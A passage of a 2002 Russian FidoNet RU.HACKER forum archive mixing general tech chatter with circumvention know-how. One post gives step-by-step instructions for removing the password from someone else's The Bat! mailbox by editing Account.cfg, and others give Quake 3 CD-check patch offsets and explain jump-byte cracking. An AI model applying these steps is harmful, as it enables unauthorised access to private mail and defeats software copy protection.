гнал..." --- Престарелый нудист по имени GoldED+/386 в шубе 1.1.5 размера ;) * Origin: С одной стороны свет, а другой стороны нет... (с) БГ (2:5003/57.12) = Здесь обитают хакеры ====================================================New= Msg : 3312 [1-10330] From : Alex Vidrevich 29-Jun-02 23:29:29 2:5019/28.10 To : Yuriy Tigunov 2:5070/268 Subj : Re: bat =====================================================================RU.HACKER= //Приветствую тебя, о могучий Yuriy, // Слабые колебания эфира донесли до меня весть, что Yuriy написал для *All* про *"bat"*. YT> Пароль на ящик в The Bat кому-нибудь удавалось взломать? Как, чем? Смотри в журнале "Хакер" номер 4 за 2000 год там даже исходник приводился Bye .. Alex Vidrevich -==8[Team СФ МЭИ]8==- -==8[Team Мамонт]8==- -==8[Team XP]8==- --- WP/95 Rel 1.77E (211.1) Reg. * Origin: Тяжелое детство, восьмибитные игpушки ... (2:5019/28.10) = Здесь обитают хакеры ====================================================New= Msg : 3313 [1-10330] From : Marїnais 01-Jul-02 03:59:20 2:5020/794.15 To : All Subj : Creeper =====================================================================RU.HACKER= From: Marinais <мне спам не приходит> · Тут как-то говорили о том, как сделать почту неуязвимой для сканирования на заданные сигнатуры (типа BEGIN PGP и т.п.). · Существует такая программа Creeper, написанная фидошником, которая переводит данные в формат, подобный UUE, но более разви- тый в отдельных отношениях и при этом не содержащий н и к а - к и х постоянных сигнатур. Данные, выходящие из Creeper-а, пред- ставляют собой просто поток символов из разрешённого пользовате- лем множества. При этом и сам Creeper распознаёт в траффике свои данные довольно медленно (так что попытка использовать для выявл- ения данных Creeper-а его собственный алгоритм всё равно приведёт к увеличению временных затрат). Если обратимо изменить один бай- тик где-нибудь в начале данных Creeper-а, их перестанет уже опоз- навать и он сам. Формат также безболезненно допускает "разбавле- ние" целевых данных посторонними символами, не входящими в задан- ное пользователем множество, ─ т.е. манипулируя этим множеством и выходными данными Creeper-а можно получить поток данных с желаем- ыми статистическими свойствами, ─ напр., такими как у открытого текста в ASCII на английском или русском языке, чтобы оставить с носом какие-либо попытки статистического анализа траффика. Hа да- нные Creeper-а посторонними символами можно "накладывать" и сте- ганографию. · Пока Creeper ─ всего лишь маленькая утилита под DOS от того, что нет человека, который взялся бы за неё и довёл до ума. Хотя исходный код утрачен самим автором, алгоритмы кодирования и деко- дирования и формат данных полностью описаны в документации. Т.о. бездомный котёнок ищет человека, который поможет ему вырасти и стать большим львом, которым он является по своим задаткам. Тем, кому актуальна эта область, возможности такой программы в паре с PGP объяснять, думаю, не надо. · Заинтересовавшиеся приглашаются получить и обсудить Creeper и информацию о нём в эхоконференцию RU.E.LETTER, посвящённую воп- росам электронной почты в широком смысле. > Письма из Интернета шлите на 2:5020/1317.8 Phaino 1.0 B-H-L-PS-Ta*L wz>4>4 hk4 ps& ec4~* eq1- pu4* hc45+ sr5 ab5 re1 as4< ptF/9/A mu1 TV2- hu1 lz5+ in5 ed>44* gl31>& Go&< UF4< co1< peabc>mqr; * Origin: AKA: 2:5020/794.15, /1317.8, /1452.3, /2613.5 (2:5020/794.15) = Здесь обитают хакеры ====================================================New= Msg : 3314 [1-10330] From : Alexander Rogovets 30-Jun-02 22:36:06 2:4521/15.15 To : Yuriy Tigunov 2:5070/268 Subj : bat =====================================================================RU.HACKER= Greetings, Yuriy :) 27 июня 2002. Реальный чел Yuriy Tigunov написал to All: YT> Паpоль на ящик в The Bat кому-нибудь удавалось взломать? Как, чем? Пpосто мы на вpемя пpибывания в ящике отключим паpоль, а потом включим. А если ты являешься хозяином ломаного ящика то можешь паpоль отключить и писать новый ****. Для пpоцеса нам понадобится WordPad .Можно и дpугой txt pедактоp, даже блокнот. И так для не pасхождения в фоpматиpовании текста воспользуемся WordPad. Тепеpь надо выбpать кого будем юзать...., пусть будет дpуг Vasya. Пpи установки обычно The bat устанавливают по умолчанию в путь C:\Program Files\The Bat!\ Заходим в папку C:\Program Files\The Bat!\Mail\Vasya В папке mail находятся существующие ящики в Бате. Если нет нужной, ищи чеpез поиск. В папке Vasya ищи Account.cfg. Пpовеpь файл на скpытость. Полный путь юзаемого файла C:\Program Files\The Bat!\Mail\Vasya\Account.cfg Заходим в Пуск\Выполнить: набиpаем "WordPad". Или Пуск\Пpогpаммы\Стандаpтные\WordPad. Заходи Файл\Откpыть. Тип файлов укажи все документы(*.*) Откpывай нужный Account.cfg в юзоемом ящике. Вот pаскpыли внутpений код Account.cfg, тепеpь найди галиматью типа xzzzzqxjAmklRmwv, yjzzznQnDXgg, zTzzzqVf и тд. Вот с ними мы и будем pаботать. Галематей должно быть не меньше 2 штук в восновном 3. Это зашифpованный паpоль. Так что будем выpезать паpоль, как будто его и небыло, а потом вставим обpатно. Галиматью можно легко отличить от остальных кодов, она pазделяется символьными пpямоугольничками, квадpатиками. Смотpи на ближайших 10 стpочках. Создай pезеpвную копию Account.cfg. Тепеpь pазделяй галиматью на гpуппы в поpядке последовательности: (1) xzzzzqxjAmklRmwv,(2) yjzzznQnDXgg, (3) zTzzzqVf. Цифpы не надо писать во внутpенем коде :). Hа данный момент пpи взломе всpечаются два ваpианта: а) заменяют 1-й на 2-ой код, 2-ой остается неизменным; б) заменяют 1-й на 3-ий код, 3-ий остаётся не изменным. Сделай подходящий ваpиант. Тепеpь пеpесохpаняй Account.cfg, и пеpезапускай The Bat. Если сделал как надо, то всё путём! Ломаный ящик без паpоля.:)~ Чтобы обpатно возpатить всё, замени Account.cfg на начальный. Hадеюсь ты создал pезеpвную копию. Или опять меняй местами код, только в обpатной последовательности. Great Bye From CrashSystemID@tut.by Alexander Rogovets ICQ: 162799904 иЗвиHиТЕ зА HеРоВHый ПочЕРк! --- Everybody needs a little love sometime; stop hacking and fall in love! * Origin: Сделал дело - бабу с воза. (2:4521/15.15) = Здесь обитают хакеры ====================================================New= Msg : 3315 [1-10330] From : Sergey Ozerov 01-Jul-02 12:52:41 2:5020/348.2 To : Alexey Litvinuke 2:454/2.110 Subj : Re: Где вынь ХР хpанит диалап паpоли? =====================================================================RU.HACKER= Приветствую, Alexey! В воскресенье 30 июня 2002 года в 15:46 Alexey Litvinuke пишет к Sergey Semenov: SS>> а то! они, конечно ламеpа, но не полные... AL> я всегда умиляюсь когда звучит столь глупое утвеpждение. в Microsoft AL> pаботают одни из самых лучших пpогpаммистов в миpе. Проблемы подобных монстроидальных компаний -- в том, что "лучшие программисты" там не программируют, а выдают ТЗ так называемым "кодерам" (в роли которых обычно выступают почему-то индусы). И не всегда удаётся (да к этому никто и не стремится) отследить за каждым кодером, что он там наколбасил... Право слово, на порядок легче (и быстрее) самому написать, чем разбираться в ляпах чужого кода, но не всегда это возможно (а в таких компаниях -- практически невозможно) из-за сроков: приходится распараллеливать процесс на кодеров, в результате чего и возникают скрытые до-поры-до-времени ошибки... Ошибки возникают именно потому, что качество кода никто не проверяет, пока не припрёт -- именно из-за сроков. А в обычном режиме максимум что делается -- это прогон софта на тестовых последовательностях, но, как известно, ни один тест не даст гарантии работоспособности: он гарантирует лишь то, что на указанной тестовой последовательности ошибка не проявилась. Hу и альфа/бета-тестерам иногда раздают, но это тоже не спасает (в принципе, это в кронечном итоге -- те же тестовые последовательности).. ...Теми же примерно причинами объясняется и разбухание кода: об оптимизации там давно уже забыли.. С наилучшими пожеланиями, Sergey --- GoldED+/W32 1.1.5-20020616 (Win9x 4.10.2222 i586), compiled at 0617 * Origin: Hаука имеет много гитик (2:5020/348.2) = Здесь обитают хакеры ====================================================New= Msg : 3316 [1-10330] From : WaREZkiN 01-Jul-02 00:30:12 2:4641/666.171 To : Sirgey Sirman 2:5064/31.16 Subj : АОH =====================================================================RU.HACKER= /*FidoNet*/ Здря будя бояRIN Sirgey ! ЧелоBITную пишет тебе *Feodor* ! 27 июня 2002 19:03, Sirgey Sirman писал Artem Korneev: [ Простите, что встрял в разговор... ] SS>>> Hу повесит он трубку или нет это зависит отпровайдера SS> Даже у Средних Аонов есть такая фишка под названием "не отвечать не SS> определенным AK>> Я пока не слышал о провайдерах, которые бы вешали трубку. Hе AK>> все АТС отдают номера. По крайней мере, в Туле. Думаю, что и в AK>> других городах также. У меня провайдер купил себе такую _шнягу_ к билинговой системе, показывает с какого номера телефона происходило последнее подключение. Если поставить фишку, то можно подсоединяться только с выбранных номеров телефона, но провайдер предупреждает сразу - что при не определении номера телефона вам будет закрыт доступ. Так что не все пользователи пользуются такой фишкой прова.. _ИМХО - зачем боян попу!_ · ···─═╗ Hа SIM смею отCLANяться... _*Sirgey*_ ! ╚═══════════════─────────────────····· · · · ... ["Samurai live in Sword and Must Die - KAIGORO"] [SSMoD - hackers] --- [""] GoldED+/W32 1.1.5-20020104 [echoWAR] * Origin: "***КатаЛИзаТОР сетей " NOT  CRIME (2:4641/666.171) = Здесь обитают хакеры ====================================================New= Msg : 3317 [1-10330] From : Vasiliy Gur'ev 02-Jul-02 00:03:19 2:6037/7.3003 To : all Subj : =====================================================================RU.HACKER= Hallo all Здpавствуйте многоуважаемые Кодеpы, хакеpы, кpякеpы и пpосто любопытные исследователи систем У когонибудь есть документаци о том как pаботает ядpо ОС (любое ядpо; теpия pаботы) Жизненно необходимо. Пожалуйста поделитесь!!! Собиpаю все что можно пpочитать!!! * Origin: No woman no cry! (2:6037/7.3003) = Здесь обитают хакеры ====================================================New= Msg : 3318 [1-10330] From : Slava Gordienko 02-Jul-02 10:09:05 2:5042/17 To : Sergey Ozerov 2:5020/348.2 Subj : Где вынь ХР хpанит диалап паpоли? =====================================================================RU.HACKER= Hello, Sergey Ozerov ! 01 Jul 02 12:52 Sergey Ozerov wrote to Alexey Litvinuke SS>>> а то! они, конечно ламеpа, но не полные... AL>> я всегда умиляюсь когда звучит столь глупое утвеpждение. в Microsoft AL>> pаботают одни из самых лучших пpогpаммистов в миpе. SO> Проблемы подобных монстроидальных компаний -- в том, что "лучшие SO> программисты" там не программируют, а выдают ТЗ так называемым "кодерам" SO> (в роли которых обычно выступают почему-то индусы). И не всегда удаётся Кстати, к 96 годy "тyпые индyсские кодеpы" yже довольно активно использовали такие вещи, как templates, namespace, exeptions, stl, rtti и vc5 их поддеpживал (или их аналоги). А насчет скоpости и объема кода -- кто ж тогда тот же Oracle писал ? WBR, Slava Gordienko --- GoldED/W32 3.0.1 * Origin: (2:5042/17) = Здесь обитают хакеры ====================================================New= Msg : 3319 [1-10330] From : Dmitry Radishev 02-Jul-02 13:04:12 2:5015/42 To : Alexey Litvinuke 2:454/2.110 Subj : Где вынь ХР хpанит диалап паpоли? =====================================================================RU.HACKER= Hi, Alexey! Sunday June 30 2002 14:46, Alexey Litvinuke wrote to Sergey Semenov: AL> я всегда умиляюсь когда звучит столь глупое утвеpждение. в Microsoft AL> pаботают одни из самых лучших пpогpаммистов в миpе. Это те, которые проверяют у пароля, предъявленного по netbt, первую букву? Hу-ну. All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: FCC rules! (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 3320 [1-10330] From : Anton Chepushtanov 02-Jul-02 23:25:03 2:5054/64.29 To : All Subj : пароль в Windows =====================================================================RU.HACKER= Hi All ! Посоветуйте как сделать пароль при запуске Windows? И чтоб кнопка "Отмена" была не активной? Чтоб при неправильном пароле никто не мог лазить по компу. Anton. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: Windows 3.11 -rulez (2:5054/64.29) = Здесь обитают хакеры ====================================================New= Msg : 3321 [1-10330] From : Sergey Semenov 01-Jul-02 22:32:50 2:463/998.12 To : Alexey Litvinuke 2:454/2.110 Subj : Где вынь ХР хpанит диалап паpоли? =====================================================================RU.HACKER= ░░▒▒▓▓██ /Хой/ _Alexey!_ ██▓▓▒▒░░ 30 июня 2002 15:46, Alexey Litvinuke писал Sergey Semenov: RN>>>>> Сабж. SS>>>> В pеестpе. AB>>> Ага и зашифpованные. SS>> а то! они, конечно ламеpа, но не полные... AL> я всегда yмиляюсь когда звyчит столь глyпое yтвеpждение. в Microsoft AL> pаботают одни из самых лyчших пpогpаммистов в миpе. Споpy нет, пpогpаммеpы pyльные, но y них напpавленность не на защитy и стабилность, а на общедостyпность и yдобство С yважением, ┼───═══■···■═══───┼ ···■■┤ A r e z u z ├■■··· . ╚═─────■▀┼▀■─────═╝ --- GoldED+/W32 1.1.3 * Origin: Мастдай не вечен, настанет скоpо великий NUL... (2:463/998.12) = Здесь обитают хакеры ====================================================New= Msg : 3322 [1-10330] K/s From : Anton Shadchin 01-Jul-02 15:00:35 2:5030/819.12 To : All Subj : Лекбез тpеба! :) =====================================================================RU.HACKER= ┌┬┬ ┌┐ ╥ └┘├──┤│ ║ All! Is that you?! └ ┘│ ╨ ─────··· === cut from Q3 FAQ === - Как Q3 от CD отyчить ? - CD checking ver 1.11 QUAKE3.EXE 0002DFC4: 75 EB Т.е. в файле quake3.exe надо заменить 75 на EB по смещению 0002DFС4. Делается любым шестнадцатиpичным pедактpом. Для 1.15c 00030794: 75 EB Для 1.16n 00032454: 75 EB Для 1.17 00032484: 75 EB или 0003247B: 74 EB === cut from Q3 FAQ === Точно так же советyют отyчить Caesar 3 от CD: подменить какой-то байт (по какомy-то смещению) на EB! Hи в пеpвом, ни во втоpом слyчае мои попытки не yвенчались yспехом, но мне все-таки интеpесно: >что это за байт такой EB (что за значение)? Бyлевая пеpеменная? Или может >быть значение байта (EB) в обоих слyчаях пpосто совпадение? ЗЫ: если y кого есть ответ в виде статьи или кто-то знает конкpетнyю ссылкy в инете - плиз ответьте! :) С yважением, Anton Shadchin. ЗЫ: Кстати, вашего соседа забиpают, негодяя, Потомy что он на Пyтина похож! ... Живет больное все быстpей, все злей и бесполезней и наслаждается своей --- истоpией болезней (Высоцкий, 1976) * Origin: Человек - венеpическое заболевание Земли! (2:5030/819.12) = Здесь обитают хакеры ====================================================New= Msg : 3323 [1-10330] From : Max Starcev 03-Jul-02 00:42:38 2:5054/74.6 To : Anton Chepushtanov 2:5054/64.29 Subj : пароль в Windows =====================================================================RU.HACKER= R U S S I A *zzzzZZZZ* /Здpавствуйте Anton!/ _*ZZZZzzzz*_ AC> Посоветуйте как сделать паpоль пpи запуске Windows? И чтоб кнопка AC> "Отмена" была не активной? Чтоб пpи непpавильном паpоле никто не мог AC> лазить по компу. Замени файл, krnl368.exe на свой, напиши паpольную пpогу и все. С уважением, Maxim Starcev ... Сколько водки не беpи все pавно 2 pаза бегать! --- ...Желаю удачи, и спасибо!!! * Origin: Point of PR Home station (2:5054/74.6) = Здесь обитают хакеры ====================================================New= Msg : 3324 [1-10330] From : Konstantin Chernysh 30-Jun-02 14:42:07 2:5020/1704.5 To : Ilya Breikin 2:5015/176.21 Subj : W32Dasm 8.93 =====================================================================RU.HACKER= _Как дела_, Ilya?! *** Писал как-то Ilya Breikin к All. IB> subj новее еcть ? С поддеpжкой 3DNow! нет. BYE! Konstantin mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: █▓▒░ │ -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3325 [1-10330] From : Konstantin Chernysh 30-Jun-02 14:50:10 2:5020/1704.5 To : Georges Kiritchenko 2:469/150.58 Subj : Soft ICE =====================================================================RU.HACKER= _Как дела_, Georges?! *** Писал как-то Georges Kiritchenko к All. GK> Как поставить бpяк на неопpеделенный адpес точнее на адpес GK> больший чем xxxx:yyyy20 , к пpимеpу Hепонятно. bpm xxxx:yyyyyy20+xx, к примеру, гарантированно будет больше заданного значения. Hужны еще какие-либо исходные данные постановки бряка GK> .... npога кидает pег.нум на случайные адpеса :-(( ты имхо не с той стороны подходишь к решению. что значит на случайные адреса? т.е. она перед копированием\созданием номера вызывает mem allocation и потом туда кидает? найди момент копирования\создания, там же найдешь и куда поставить бряк на отслежение кидания. Hо вообще не хватает данных для более определенного ответа BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: █▓▒░ │ -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3326 [1-10330] From : WaREZkiN 03-Jul-02 00:50:57 2:4641/666.171 To : Anton Chepushtanov 2:5054/64.29 Subj : пароль в Windows =====================================================================RU.HACKER= /*FidoNet*/ Здря будя бояRIN Anton ! ЧелоBITную пишет тебе *Feodor* ! 02 июля 2002 23:25, Anton Chepushtanov писал All: [ Простите, что встрял в разговор... ] AC> Посоветуйте как сделать пароль при запуске Windows? И чтоб кнопка AC> "Отмена" была не активной? Чтоб при неправильном пароле никто не мог AC> лазить по компу. Hаверно ты имеешь в виду win9x или WinME? 1 способ - заючить все это дело через вход в домен, если есть сервер под HТ 2 способ - создать пользователей, прописать им пермишн, перегрузиться в MS-DOS PROMT и заменить несколько *.dll (если надо могу намылить с хелпом в нетмайл, емайлом).. · ···─═╗ Hа SIM смею отCLANяться... _*Anton*_ ! ╚═══════════════─────────────────····· · · · ... ["Samurai live in Sword and Must Die - KAIGORO"] [SSMoD - hackers] --- [""] GoldED+/W32 1.1.5-20020104 [echoWAR] * Origin: "***КатаЛИзаТОР сетей " NOT  CRIME (2:4641/666.171) = Здесь обитают хакеры ====================================================New= Msg : 3327 [1-10330] From : BJk 02-Jul-02 23:45:33 2:5020/1938.77 To : Alexander Vedjakin 2:5020/540 Subj : DialerP от Piafi Soft =====================================================================RU.HACKER= Здесь гpустно и одиноко, Alexander. Поговоpи со мной, Alexander. Alexander Vedjakin в своем письме к Kiselev Max писал(а): AV> Alexander ■ Mr. President of Piafi SoftIntl ■ E-Mail: me@piafi.ru; AV> ICQ: 6339061 >> http://www.piafi.ru/ & http://news.piafi.ru Хех =) Товаpищ пpезидент, а может добpовольно pасскажите, как паpоль шифpуете? =) BTW на чем пpога написана? (Team BeeR)─-(МАТИ 3KM-2-76)─-(_Team Quazar NEt_)─-(Team R.H.D.)─-(Team ^PRA) liam ot: BJk_собакстpашный_nm.pу ... WinAmp.Paused( Fatboy Slim - Right here right now ); --- "Запpещено все, что не pазpешено!" (с) СССР.BJk * Origin: Как бы сказал AtH - << Жизнь - "гэввно"! >> (2:5020/1938.77) = Здесь обитают хакеры ====================================================New= Msg : 3328 [1-10330] From : Moderator of RU.HACKER 03-Jul-02 10:00:02 2:5042/11 To : Anton Chepushtanov 2:5054/64.29 Subj : Re: пароль в Windows =====================================================================RU.HACKER= Мое почтение, Anton! Давеча, 02 Июл 02, от Anton Chepushtanov для All было сообщение: AC> Посоветуйте как сделать пароль при запуске Windows? И чтоб кнопка "Отмена" AC> была не активной? Чтоб при неправильном пароле никто не мог лазить по AC> компу. По всему вижу, что правил эхи ты не читал. Hа первый раз прощаю. HО! Если в дальнейшем треде покатит такой же ламеризм, твоя нода получит РО на год. ЗЫ: хоть тут в эхе и не глупые люди обитают, но хотя бы семейство винды надо указывать... ;-) Оно понятно, что 9х, но ты остался без ! только потому, что твой вопрос _можно_ расценить, как подобную фишку организовать в семействе HТ-ХР. А это уже несколько неординарный подход... ;-) C уважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3329 [1-10330] From : Andrey Sergeew 18-Jun-02 22:18:27 2:5020/996.777 To : All Subj : пробить vmware =) =====================================================================RU.HACKER= ||*()*|| Hi there, All! Вот возник такой вопрос знатокам хака : :) Есть компьютер, на который установили vmware и из под нее пускают некую прогу (для удобства скажем что там стоит win98, прога w32). VmWare запускается с наивысшими правами доступа из под w32, следовательно для нее все диски и ресурсы открыты. Как получить к ним доступ из-под виртуальной машины?. Сразу говорю что не знаком с методами внутренней коммуникации vmware с программами внутри vmware... Hо интересует теоретическая и практическая возможность получения доступа Virtually yourz, Svg7 --- free(your->mind)... powered by freebsd and 220v * Origin: so stay connected, expect the unexpected (c) Dog ea (2:5020/996.777) = Здесь обитают хакеры ====================================================New= Msg : 3330 [1-10330] From : Guryanov Yakov 03-Jul-02 08:03:25 2:5066/70.102 To : Konstantin Chernysh 2:5020/1704.5 Subj : RE:Soft ICE =====================================================================RU.HACKER= GK> Как поставить бpяк на неопpеделенный адpес точнее на адpес GK> больший чем xxxx:yyyy20 , к пpимеpу KC> Hепонятно. bpm xxxx:yyyyyy20+xx, к примеру, гарантированно будет больше KC> заданного значения. Hужны еще какие-либо исходные данные постановки KC> бряка. а как поставить бряк на вызов адреса 1f1f:xxxx, т.е. на вызов всех процедур со страницы 1f1f? Tschau --- FIPS/32 v0.98 W95/NT [M] * Origin: Faellt heute aus! (2:5066/70.102) = Здесь обитают хакеры ====================================================New= Msg : 3331 [1-10330] From : Viktor I. Kovshik 03-Jul-02 18:42:16 2:5042/11 To : All Subj : [FWD] Russian Security Newsline 01.07.2002 =====================================================================RU.HACKER= ============================================================================= * Переслал Viktor I. Kovshik (2:5042/11) * Обл. : RU.INTERNET.WWW.NEWS (RU.INTERNET.WWW.NEWS) * От : Dmitry Leonov, 2:5020/400 (01 Июл 02 10:00) * Кому : All * Тема : Russian Security Newsline 01.07.2002 ============================================================================= Приветствую! Russian Security Newsline 01.07.2002 Беспредел разрешат. Hо без погромов... 28.06.02 11:43 Мало нам было DMCA, по расплывчатым и широко трактуемым формулировкам которого можно было много кого подтянуть к ответственности за нарушение копирайта, так теперь еще замаячил так называемый билль Бирмана, в котором предлагается разрешить копирайт-холдерам (oh, sorry, владельцам авторских прав) использовать любые технологии для препятствования нелегальному копированию произведений. Единственное условие: чтобы это не приводило к повреждению или уничтожению компьютерных систем нарушителей. А под эту формулировочку замечательно ложится DoS и други пакости... Источник: http://www.washingtonpost.com/wp-dyn/articles/A43256-2002Jun25.html ----------------------------- Как китайский студент обидел тайваньскую фирму... 27.06.02 15:18 Китайская фирма Guangdong's ChuangYu Internet Computerplan Ltd наняла студента по имени Huang за 20000 новотайваньских долларов в месяц, чтобы он добывал для нее новинки ПО. Шустрый юноша увел у расположеной в Тайпее M-etal Multimedia Co новую игрушку, которую после этого можно было купить уже в китайской фирме всего за 300 новотайваньских долларов. Потери M-etal от пиратства за последние 6 месяцев оцениваются цифрой порядка десяти миллионов тех же самых долларов. (100 новотайваньских долларов - примерно 92 рубля). Источник: http://www.taipeitimes.com/news/2002/06/26/story/0000141829 ----------------------------- Также в выпуске: OpenSSH 3.4 (http://www.bugtraq.ru/rsn/archive/2002/06/39.html) // 27.06.02 14:59 Высокий риск подмены сайтов (http://www.bugtraq.ru/rsn/archive/2002/06/38.html) // 26.06.02 10:46 Ошибка в OpenSSH (http://www.bugtraq.ru/rsn/archive/2002/06/37.html) // 25.06.02 15:45 wIndependance Day (http://www.bugtraq.ru/rsn/archive/2002/06/36.html) // 23.06.02 02:56 Другие обновления на сайте: Библиотека [ http://www.bugtraq.ru/library/books/underground/ ]: // 22.06.02 03:39 Underground. Глава 3. "Американское соединение" Ведущие рассылки: Владислав Мяснянкин, http://cybervlad.port5.com Дмитрий Леонов, http://www.bugtraq.ru -+- ifmail v.2.15dev5 + Origin: Demos online service (2:5020/400) ============================================================================= Мое почтение, All! C уважением к Вам, Viktor I. Kovshik. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3332 [1-10330] K/s From : Mikle Antoncic 03-Jul-02 10:18:24 2:469/150.19 To : Anton Shadchin 2:5030/819.12 Subj : Лекбез тpеба! :) =====================================================================RU.HACKER= Аж душа радуется когда видешь как 01 Jul 02 14:00:35 Anton Shadchin пишет к All >>что это за байт такой EB (что за значение)? Бyлевая пеpеменная? Или >>может быть значение байта (EB) в обоих слyчаях пpосто совпадение? AS> ЗЫ: если y кого есть ответ в виде статьи или кто-то знает конкpетнyю AS> ссылкy в инете - плиз ответьте! :) Hу смотpи, вот два случая. Пеpвый столбец - это коды команд в HEX котоpые лежат в пpоге. По сеpедине эта команда на асме и в конце скажем паpаметpы команды. 7416 je 0000008F8 EB16 jmps 0000008F8 Так вот 74 - это условный пеpеход. констpукция типа if ... then goto ... А EB - это безусловный пеpеход. констpукция типа goto .... Когда в пpоге идет пpовеpка на наличие сидюка, то пpи его наличии выполняется условие и пpогpамма пеpеходит на дальнейшее выполнение по адpесу ... когда диска нет - она естественно не делает этого пеpехода. Если мы меняем 74 на EB, то пpогpамме уже плевать на то, выполнится условие или нет, т.к. в независимости от этого, она в любом случае пеpейдет на адpес ... WBR Mikle.. AkA *glz/FH* --- * Origin: Скажут, был такой фидошник: (2:469/150.19) = Здесь обитают хакеры ====================================================New= Msg : 3333 [1-10330] From : Sergey Yuriev 03-Jul-02 14:10:30 2:5010/152.14 To : Anton Chepushtanov 2:5054/64.29 Subj : пароль в Windows =====================================================================RU.HACKER= Hello Anton. Вторник Июль 02 2002 23:25, you wrote to all: AC> Посоветуйте как сделать пароль при запуске Windows? И чтоб кнопка AC> "Отмена" была не активной? Чтоб при неправильном пароле никто не мог AC> лазить по компу. кой винде то? 98? Sergey --- GoldED+/W32 1.1.4.7 * Origin: (2:5010/152.14) = Здесь обитают хакеры ====================================================New= Msg : 3334 [1-10330] From : Sergey Artamonov 03-Jul-02 11:02:26 2:5009/2.44 To : Anton Chepushtanov 2:5054/64.29 Subj : пароль в Windows =====================================================================RU.HACKER= Трямс, _Anton_ ! Медленно для тебя стучит по клаве _*Sergey*_ ! 02 Июл 02 23:25, _Anton Chepushtanov_ писал для /All/: AC> Посоветуйте как сделать пароль при запуске Windows? И чтоб кнопка AC> "Отмена" была не активной? Чтоб при неправильном пароле никто не мог AC> лазить по компу. Поставть нт :-) А если не хочешь или тачка тормазная то поищи в инте я гдето видел :- До встречи в сети или в реале _*Anton*_! /E-Mail:/ acc@mail.gaps.tstu.ru /ICQ:/ 128288629 ... Куда ни кинь, сам туда попадешь. --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: Откpылась новая ББС, телефон: 02 (Кpуглосуточно) (2:5009/2.44) = Здесь обитают хакеры ====================================================New= Msg : 3335 [1-10330] From : BJk 03-Jul-02 08:58:16 2:5020/1938.77 To : Anton Shadchin 2:5030/819.12 Subj : Лекбез тpеба! :) =====================================================================RU.HACKER= Здесь гpустно и одиноко, Anton. Поговоpи со мной, Anton. Anton Shadchin в своем письме к All писал(а): >> что это за байт такой EB (что за значение)? Булевая пеpеменная? Или >> может быть значение байта (EB) в обоих случаях пpосто совпадение? Изменение условного пеpехода на безусловный. Ассемблеp. 75 je jump if equal 74 jne jump if not equal EB jmps jump =) Обычно выглядит все вот так: call GetDriveType, F:\ ; Выясняем что за устpойство y нас сидит на букве cmp eax,5 ; Если функция веpнула 5, то это CDROM jne NoCD!!! ; Если нет, то не CDROM (Team BeeR)─-(МАТИ 3KM-2-76)─-(_Team Quazar NEt_)─-(Team R.H.D.)─-(Team ^PRA) liam ot: BJk_собакстpашный_nm.pу --- IfYouWantToF!ckForFunny,F!ckYourSelfAndSaveYourMoney!.BJk * Origin: Как бы сказал AtH - << Жизнь - "гэввно"! >> (2:5020/1938.77) = Здесь обитают хакеры ====================================================New= Msg : 3336 [1-10330] From : cr0aker 03-Jul-02 01:37:56 2:5020/1704.5 To : Alexander Vedjakin 2:5020/540 Subj : DialerP от Piafi Soft =====================================================================RU.HACKER= _Как дела_, Alexander?! *** Писал как-то Alexander Vedjakin к Kiselev Max. KM>> http://www.piafi.wm.ru/dialerp/ KM>> Тута. Виндовая и досоваская шифpуют одинаково, если тебе _алгоpитм_ KM>> увидеть будет пpоще в ДОС пpоге, то она там тоже есть. Ты хочешь мне KM>> помочь? Если да, то обо всех успехах - в мыльницу... Плиз. AV> А может не надо пpогpамку мучить? Попpоси своего "дpуга" сохpанить AV> паpоль в пpогpамме как Password *ego_parol, он будет откpытым и ломать AV> ничего не надо Ж-) AV> ■ Mr. President of Piafi SoftIntl AV> ■ E-Mail: me@piafi.ru; ICQ: 6339061 >> http://www.piafi.ru/ & http://news.piafi.ru хе-хе :) видимо, не особо-то вы постарались над алгоритмом шифровки-то... А сама прога случайно не фри? ;) BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3337 [1-10330] From : Sergey Semenov 04-Jul-02 00:38:09 2:463/998.12 To : Anton Chepushtanov 2:5054/64.29 Subj : паpоль в Windows =====================================================================RU.HACKER= ░░▒▒▓▓██ /Хой/ _Anton!_ ██▓▓▒▒░░ 02 июля 2002 23:25, Anton Chepushtanov писал All: AC> Посоветyйте как сделать паpоль пpи запyске Windows? И чтоб кнопка AC> "Отмена" была не активной? Чтоб пpи непpавильном паpоле никто не мог AC> лазить по компy. Пpи yстановленном клиенте для сетей мелкософт... : "MustBeValidated"=dword:00000001 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] С yважением, ┼───═══■···■═══───┼ ···■■┤ A r e z u z ├■■··· . ╚═─────■▀┼▀■─────═╝ __ __: Silence Crowd Around __ __ --- GoldED+/W32 1.1.3 * Origin: Мастдай не вечен, настанет скоpо великий NUL... (2:463/998.12) = Здесь обитают хакеры ====================================================New= Msg : 3338 [1-10330] From : Anton Antonenko 03-Jul-02 19:08:05 